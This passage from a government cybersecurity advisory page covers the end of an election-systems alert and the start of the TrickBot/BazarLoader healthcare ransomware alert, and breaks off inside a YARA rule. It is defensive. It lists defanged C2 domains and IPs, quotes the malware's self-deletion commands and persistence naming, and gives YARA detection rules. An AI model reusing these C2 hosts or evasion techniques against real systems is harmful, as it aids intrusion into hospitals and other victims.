<li>104.206.13[.]27 (Observed September 30, 2020)</li>
<li>154.16.93[.]125 (Observed September 30, 2020)</li>
<li>185.191.207[.]169 (Observed September 30, 2020)</li>
<li>185.191.207[.]52 (Observed September 30, 2020)</li>
<li>194.127.172[.]98 (Observed September 30, 2020)</li>
<li>194.35.233[.]83 (Observed September 30, 2020)</li>
<li>198.147.23[.]147 (Observed September 30, 2020)</li>
<li>198.16.66[.]139(Observed September 30, 2020)</li>
<li>212.102.45[.]3 (Observed September 30, 2020)</li>
<li>212.102.45[.]58 (Observed September 30, 2020)</li>
<li>31.168.98[.]73 (Observed September 30, 2020)</li>
<li>37.120.204[.]156 (Observed September 30, 2020)</li>
<li>5.160.253[.]50 (Observed September 30, 2020)</li>
<li>5.253.204[.]74 (Observed September 30, 2020)</li>
<li>64.44.81[.]68 (Observed September 30, 2020)</li>
<li>84.17.45[.]218 (Observed September 30, 2020)</li>
<li>89.187.182[.]106 (Observed September 30, 2020)</li>
<li>89.187.182[.]111 (Observed September 30, 2020)</li>
<li>89.34.98[.]114 (Observed September 30, 2020)</li>
<li>89.44.201[.]211 (Observed September 30, 2020)</li>
</ul>

<h2>Recommendations</h2>

<p>The following list provides recommended self-protection mitigation strategies against cyber techniques used by advanced persistent threat actors:&nbsp;</p>

<ul>
<li>Validate input as a method of sanitizing untrusted input submitted by web application users. Validating input can significantly reduce the probability of successful exploitation by providing protection against security flaws in web applications. The types of attacks possibly prevented include SQL injection, Cross Site Scripting (XSS), and command injection.</li>
<li>Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable unnecessary services and install available patches for the services in use. Users may need to work with their technology vendors to confirm that patches will not affect system processes.</li>
<li>Verify all cloud-based virtual machine instances with a public IP, and avoid using open RDP ports, unless there is a valid need. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.</li>
<li>Enable strong password requirements and account lockout policies to defend against brute-force attacks.</li>
<li>Apply multi-factor authentication, when possible.</li>
<li>Maintain a good information back-up strategy by routinely backing up all critical data and system configuration information on a separate device. Store the backups offline, verify their integrity, and verify the restoration process.</li>
<li>Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.</li>
<li>When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.</li>
<li>Ensure third parties that require RDP access follow internal remote access policies.</li>
<li>Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.</li>
<li>Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as a VPNs. However, recognize the security of VPNs matches the security of the connected devices.</li>
<li>Use security features provided by social media platforms; use <a href=”https://us-cert.cisa.gov/ncas/current-activity/2018/03/27/Creating-and-Managing-Strong-Passwords”>strong passwords</a>, change passwords frequently, and use a different password for each social media account.&nbsp;</li>
<li>See CISA’s Tip on <a href=”https://us-cert.cisa.gov/ncas/tips/ST19-002″>Best Practices for Securing Election Systems</a> for more information.&nbsp;</li>
</ul>

<h3>General Mitigations</h3>

<p><em><strong>Keep applications and systems updated and patched</strong></em></p>

<p>Apply all available software updates and patches and automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed of threat actors to create new exploits following the release of &nbsp;a patch. These “N-day” exploits can be as damaging as zero-day exploits. Ensure the authenticity and integrity of vendor updates by using signed updates delivered over protected links. Without the rapid and thorough application of patches, threat actors can operate inside a defender’s patch cycle. <fn value=”2″>NSA “NSA’S Top Ten Cybersecurity Mitigation Strategies” https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf</fn> Additionally, use tools (e.g., the OWASP Dependency-Check Project tool <fn value=”3″>https://owasp.org/www-project-dependency-check/</fn>) to identify the publicly known vulnerabilities in third-party libraries depended upon by the application.</p>

<p><em><strong>Scan web applications for SQL injection and other common web vulnerabilities</strong></em></p>

<p>Implement a plan to scan public-facing web servers for common web vulnerabilities (e.g., SQL injection, cross-site scripting) by using a commercial web application vulnerability scanner in combination with a source code scanner. <fn value=”4″>https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm</fn> Fixing or patching vulnerabilities after they are identified is especially crucial for networks hosting older web applications. As sites get older, more vulnerabilities are discovered and exposed.</p>

<p><em><strong>Deploy a web application firewall &nbsp;</strong></em></p>

<p>Deploy a web application firewall (WAF) to prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools.&nbsp;</p>

<p><em><strong>Deploy techniques to protect against web shells</strong></em></p>

<p>Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware. <fn value=”5″>NSA &amp; ASD “CyberSecurity Information: Detect and Prevent Web Shell Malware” https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF</fn> Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.&nbsp;</p>

<p><em><strong>Use multi-factor authentication for administrator accounts</strong></em></p>

<p>Prioritize protection for accounts with elevated privileges, remote access, or used on high-value assets. <fn value=”6″>https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs</fn> Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs). <fn value=”7″>NSA “NSA’S Top Ten Cybersecurity Mitigation Strategies” https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf</fn> Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.</p>

<p><em><strong>Remediate critical web application security risks</strong></em></p>

<p>First, identify and remediate critical web application security risks. Next, move on to other less critical vulnerabilities. Follow available guidance on securing web applications. <fn value=”8″>NSA “Building Web Applications – Security for Developers” https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm</fn>&nbsp;<fn value=”9″>https://owasp.org/www-project-top-ten/</fn> <fn value=”10″>https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html</fn></p>

<h2>How do I respond to unauthorized access to election-related systems?</h2>

<h3>Implement your security incident response and business continuity plan</h3>

<p>It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.</p>

<h3>Contact CISA or law enforcement immediately&nbsp;</h3>

<p>To report an intrusion and to request incident response resources or technical assistance, contact CISA (<a href=”https://us-cert.cisa.govmailto:Central@cisa.gov”>Central@cisa.gov</a> or 888-282-0870) or the FBI through a local field office or the FBI’s Cyber Division (<a href=”https://us-cert.cisa.govmailto:CyWatch@ic.fbi.gov”>CyWatch@ic.fbi.gov</a> or 855-292-3937).</p>

<h2>Resources</h2>

<ul>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST19-002″>Best Practices for Securing Election Systems</a></li>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST16-001″>Securing Voter Registration Data&nbsp;</a></li>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST18-006″>Website Security&nbsp;</a></li>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST04-014″>Avoiding Social Engineering and Phishing Attacks</a></li>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST18-001″>Securing Network Infrastructure Devices</a>&nbsp;</li>
<li>Joint Advisory: <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-245a”>Technical Approaches to Uncovering and Remediating Malicious Activity</a></li>
<li>CISA Insights: <a href=”https://www.cisa.gov/sites/default/files/publications/CISA_Insights_Actions_to_Counter_Email-Based_Attacks_on_Election-Related_S508C.pdf”>Actions to Counter Email-Based Attacks on Election-related Entities</a>&nbsp;</li>
<li>FBI and CISA Public Service Announcement (PSA): <a href=”https://ic3.gov/Media/Y2020/PSA201002″>Spoofed Internet Domains and Email Accounts Pose Cyber and Disinformation Risks to Voters</a></li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA201001″>Foreign Actors Likely to Use Online Journals to Spread Disinformation Regarding 2020 Elections</a>&nbsp;</li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200930″>Distributed Denial of Service Attacks Could Hinder Access to Voting Information, Would Not Prevent Voting</a>&nbsp;</li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200928″>False Claims of Hacked Voter Information Likely Intended to Cast Doubt on Legitimacy of U.S. Elections</a></li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200924″>Cyber Threats to Voting Processes Could Slow But Not Prevent Voting</a>&nbsp;</li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200922″>Foreign Actors and Cybercriminals Likely to Spread Disinformation Regarding 2020 Election Result</a></li>
</ul>

<p>&nbsp;</p>
<h3>Revisions</h3>
<ul> <li>October 30, 2020: Initial Version</li> <li>November 3, 2020: Updated IOC disclaimer to emphasize that only activity listed in this alert warrants further investigation.</li> </ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy &amp; Use</a> policy.</p>

</div>

Categories
alerts

AA20-302A: Ransomware Activity Targeting the Healthcare and Public Health Sector

Original release date: October 28, 2020 | Last revised: November 2, 2020<br/><h3>Summary</h3><p><strong><em>This advisory was updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection.</em></strong></p>

<p class=”tip-intro” style=”font-size: 15px;”><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 7 framework. See the <a href=”https://attack.mitre.org/versions/v7/techniques/enterprise/”>ATT&amp;CK for Enterprise version 7</a> for all referenced threat actor tactics and techniques.</em></p>

<p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS). This advisory describes the tactics, techniques, and procedures (TTPs) used by cybercriminals against targets in the Healthcare and Public Health&nbsp;(HPH) Sector&nbsp;to infect systems with ransomware, notably Ryuk and Conti, for financial gain.</p>

<p>CISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.</p>

<p><a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf”>Click here</a> for a PDF version of this report.</p>

<h4>Key Findings</h4>

<ul>
<li>CISA, FBI, and HHS assess malicious cyber actors are targeting the HPH Sector with TrickBot and BazarLoader malware, often leading to ransomware attacks, data theft, and the disruption of healthcare services.</li>
<li>These issues will be particularly challenging for organizations within the COVID-19 pandemic; therefore, administrators will need to balance this risk when determining their cybersecurity investments.</li>
</ul>
<h3>Technical Details</h3><h3>Threat Details</h3>

<p>The cybercriminal enterprise behind TrickBot, which is likely also the creator of BazarLoader malware, has continued to develop new functionality and tools, increasing the ease, speed, and profitability of victimization. These threat actors increasingly use loaders—like TrickBot and BazarLoader (or BazarBackdoor)—as part of their malicious cyber campaigns. Cybercriminals disseminate TrickBot and BazarLoader via phishing campaigns that contain either links to malicious websites that host the malware or attachments with the malware. Loaders start the infection chain by distributing the payload; they deploy and execute the backdoor from the command and control (C2) server and install it on the victim’s machine.</p>

<h4>TrickBot</h4>

<p>What began as a banking trojan and descendant of Dyre malware, TrickBot now provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. These activities include credential harvesting, mail exfiltration, cryptomining, point-of-sale data exfiltration, and the deployment of ransomware, such as Ryuk and Conti.</p>

<p>In early 2019, the FBI began to observe new TrickBot modules named Anchor, which cyber actors typically used in attacks targeting high-profile victims—such as large corporations. These attacks often involved data exfiltration from networks and point-of-sale devices. As part of the new Anchor toolset, TrickBot developers created <code>anchor_dns</code>, a tool for sending and receiving data from victim machines using Domain Name System (DNS) tunneling.</p>

<p><code>anchor_dns</code> is a backdoor that allows victim machines to communicate with C2&nbsp;servers over DNS to evade typical network defense products and make their malicious communications blend in with legitimate DNS traffic. <code>anchor_dns</code> uses a single-byte <code>XOR</code> cipher to encrypt its communications, which have been observed using key <code>0xB9</code>. Once decrypted, the string <code>anchor_dns</code> can be found in the DNS request traffic.</p>

<h4>TrickBot Indicators of Compromise</h4>

<p>After successful execution of the malware, TrickBot copies itself as an executable file with a 12-character&nbsp;randomly generated file name (e.g. <code>mfjdieks.exe</code>) and places this file in one of the following directories.</p>

<ul>
<li>C:Windows</li>
<li>C:WindowsSysWOW64</li>
<li>C:Users[Username]AppDataRoaming</li>
</ul>

<p>Once the executable is running and successful in establishing communication with C2s, the executable places appropriate modules downloaded from C2s for the infected processor architecture type (32 or 64 bit instruction set), to the infected host’s <code>%APPDATA%</code> or <code>%PROGRAMDATA%</code> directory, such as <code>%AppDataRoamingwinapp</code>. Some commonly named plugins that are created in a Modules subdirectory are (the detected architecture is appended to the module filename, e.g., <code>importDll32</code> or <code>importDll64</code>):</p>

<ul>
<li><code>Systeminfo</code></li>
<li><code>importDll</code></li>
<li><code>outlookDll</code></li>
<li><code>injectDll </code>with a directory (ex. <code>injectDLL64_configs</code>) containing configuration files:
<ul>
<li><code>dinj</code></li>
<li><code>sinj</code></li>
<li><code>dpost</code></li>
</ul>
</li>
<li><code>mailsearcher</code> with a directory (ex. <code>mailsearcher64_configs</code>) containing configuration file:
<ul>
<li><code>mailconf</code></li>
</ul>
</li>
<li><code>networkDll</code> with a directory (ex. networkDll64_configs) containing configuration file:
<ul>
<li><code>dpost</code></li>
</ul>
</li>
<li><code>wormDll</code></li>
<li><code>tabDll</code></li>
<li><code>shareDll</code></li>
</ul>

<p>Filename <code>client_id</code> or <code>data </code>or <code>FAQ </code>with the assigned bot ID of the compromised system is created in the malware directory. Filename <code>group_tag</code> or <code>Readme.md</code> containing the TrickBot campaign IDs is created in the malware directory.</p>

<p>The malware may also drop a file named <code>anchorDiag.txt</code> in one of the directories listed above.</p>

<p>Part of the initial network communications with the C2 server involves sending information about the victim machine such as its computer name/hostname, operating system version, and build via a base64-encoded <code>GUID</code>. The <code>GUID </code>is composed of <code>/GroupID/ClientID/</code> with the following naming convention:</p>

<p><code>/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/</code>.</p>

<p>The malware uses scheduled tasks that run every 15 minutes to ensure persistence on the victim machine. The scheduled task typically uses the following naming convention.</p>

<p><code>[random_folder_name_in_%APPDATA%_excluding_Microsoft]</code></p>

<p><code>autoupdate#[5_random_numbers] (e.g., Task autoupdate#16876)</code>.</p>

<p>After successful execution, <code>anchor_dns</code> further deploys malicious batch scripts (<code>.bat</code>) using PowerShell commands.</p>

<p>The malware deploys self-deletion techniques by executing the following commands.</p>

<ul>
<li><code>cmd.exe /c timeout 3 &amp;&amp; del C:Users[username][malware_sample]</code></li>
<li><code>cmd.exe /C PowerShell “Start-Sleep 3; Remove-Item C:Users[username][malware_sample_location]”</code></li>
</ul>

<p>The following domains found in outbound DNS records are associated with <code>anchor_dns</code>.</p>

<ul>
<li><code>kostunivo[.]com</code></li>
<li><code>chishir[.]com</code></li>
<li><code>mangoclone[.]com</code></li>
<li><code>onixcellent[.]com</code></li>
</ul>

<p>This malware used the following legitimate domains to test internet connectivity.</p>

<ul>
<li><code>ipecho[.]net</code></li>
<li><code>api[.]ipify[.]org</code></li>
<li><code>checkip[.]amazonaws[.]com</code></li>
<li><code>ip[.]anysrc[.]net</code></li>
<li><code>wtfismyip[.]com</code></li>
<li><code>ipinfo[.]io</code></li>
<li><code>icanhazip[.]com</code></li>
<li><code>myexternalip[.]com</code></li>
<li><code>ident[.]me</code></li>
</ul>

<p>Currently, there is an open-source tracker for TrickBot C2 servers located at <a href=”https://feodotracker.abuse.ch/browse/trickbot/”>https://feodotracker.abuse.ch/browse/trickbot/</a>.</p>

<p>The <code>anchor_dns</code> malware historically used the following C2 servers.</p>

<ul>
<li><code>23[.]95[.]97[.]59</code></li>
<li><code>51[.]254[.]25[.]115</code></li>
<li><code>193[.]183[.]98[.]66</code></li>
<li><code>91[.]217[.]137[.]37</code></li>
<li><code>87[.]98[.]175[.]85</code></li>
</ul>

<h4>TrickBot YARA Rules</h4>

<div class=”special_container”>rule anchor_dns_strings_filenames {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = “Rule to detect AnchorDNS samples based off strings or filenames used in malware”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = “NCSC”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = “fc0efd612ad528795472e99cae5944b68b8e26dc”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = “794eb3a9ce8b7e5092bb1b93341a54097f5b78a9″<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash3 = “9dfce70fded4f3bc2aa50ca772b0f9094b7b1fb2″<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash4 = “24d4bbc982a6a561f0426a683b9617de1a96a74a”<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “,Control_RunDLL x00″<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “:$GUID” ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “:$DATA” ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “/1001/”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = /(x00|xCC)qwertyuiopasdfghjklzxcvbnm(x00|xCC)/<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = /(x00|xCC)QWERTYUIOPASDFGHJKLZXCVBNM(x00|xCC)/<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “start program with cmdline “%s””<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “Global\fde345tyhoVGYHUJKIOuy”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “ChardWorker::thExecute: error registry me”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “get command: incode %s, cmdid “%s”, cmd “%s””<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “anchorDNS”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “Anchor_x86″<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “Anchor_x64″<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_icmp_transport {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = “Rule to detect AnchorDNS samples based off ICMP transport strings”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = “NCSC”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = “056f326d9ab960ed02356b34a6dcd72d7180fc83″<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “reset_connection &lt;- %s”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “server_ok &lt;- %s (packets on server %s)”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “erase successfully transmitted packet (count: %d)”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “Packet sended with crc %s -&gt; %s”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “send data confimation to server(%s)”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “data recived from &lt;- %s”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “Rearmost packed recived (id: %s)”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = “send poll to server -&gt; : %s”<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_config_dexor {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = “Rule to detect AnchorDNS samples based off configuration deobfuscation (XOR 0x23 countup)”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = “NCSC”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = “d0278ec015e10ada000915a1943ddbb3a0b6b3db”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = “056f326d9ab960ed02356b34a6dcd72d7180fc83″<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x86 = {75 1F 56 6A 40 B2 23 33 C9 5E 8A 81 ?? ?? ?? ?? 32 C2 FE C2 88 81 ?? ?? ?? ?? 41 83 EE 01 75 EA 5E B8 ?? ?? ?? ?? C3}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x64 = {41 B0 23 41 B9 80 00 00 00 8A 84 3A ?? ?? ?? 00 41 32 C0 41 FE C0 88 04 32 48 FF C2 49 83 E9 01 75 E7}<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_installer {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = “Rule to detect AnchorDNS installer samples based off MZ magic under one-time pad or deobfuscation loop code”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = “NCSC”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = “fa98074dc18ad7e2d357b5d168c00a91256d87d1″<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = “78f0737d2b1e605aad62af252b246ef390521f02″<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $pre = {43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00} //CONOUT$<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $pst = {6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00} //kernel32.dll<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $deob_x86 = {8B C8 89 4D F8 83 F9 FF 74 52 46 89 5D F4 88 5D FF 85 F6 74 34 8A 83 ?? ?? ?? ?? 32 83 ?? ?? ?? ?? 6A 00 88 45 FF 8D 45 F4 50 6A 01 8D 45 FF 50 51 FF 15 34 80 41 00 8B 4D F8 43 8B F0 81 FB 00 ?? ?? ?? 72 CC 85 F6 75 08}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $deob_x64 = {42 0F B6 84 3F ?? ?? ?? ?? 4C 8D 8C 24 80 00 00 00 42 32 84 3F ?? ?? ?? ?? 48 8D 54 24 78 41 B8 01 00 00 00 88 44 24 78 48 8B CE 48 89 6C 24 20 FF 15 ?? ?? ?? ?? 48 FF C7 8B D8 48 81 FF ?? ?? ?? ?? 72 B8}<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (&nbsp;&nbsp; uint16(@pre+16) ^ uint16(@pre+16+((@pst-(@pre+16))2)) == 0x5A4D<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $deob_x86 or $deob_x64<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br />
}</div>

<div class=”special_container”>import “pe”<br />
rule anchor_dns_string_1001_with_pe_section_dll_export_resolve_ip_domains {<br />
&nbsp;&nbsp;&nbsp; meta:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = “Rule to detect AnchorDNS samples based off /1001/ string in combination with DLL export name string, PE section .addr or IP resolution domains”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = “NCSC”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = “ff8237252d53200c132dd742edc77a6c67565eee”<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = “c8299aadf886da55cb47e5cbafe8c5a482b47fc8″<br />
&nbsp;&nbsp;&nbsp; strings:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $str1001 = {2F 31 30 30 31 2F 00} // /1001/<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $strCtrl = {2C 43 6F 6E 74 72 6F 6C 5F 52 75 6E 44 4C 4C 20 00} // ,Control_RunDLL<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip1 = “checkip.amazonaws.com” ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip2 = “ipecho.net” ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip3 = “ipinfo.io” ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip4 = “api.ipify.org” ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip5 = “icanhazip.com” ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip6 = “myexternalip.com” ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip7 = “wtfismyip.com” ascii wide<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip8 = “ip.anysrc.net” ascii wide<br />
&nbsp;&nbsp;&nbsp; condition:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and $str1001<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and (<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; for any i in (0..pe.number_of_sections): (<br />
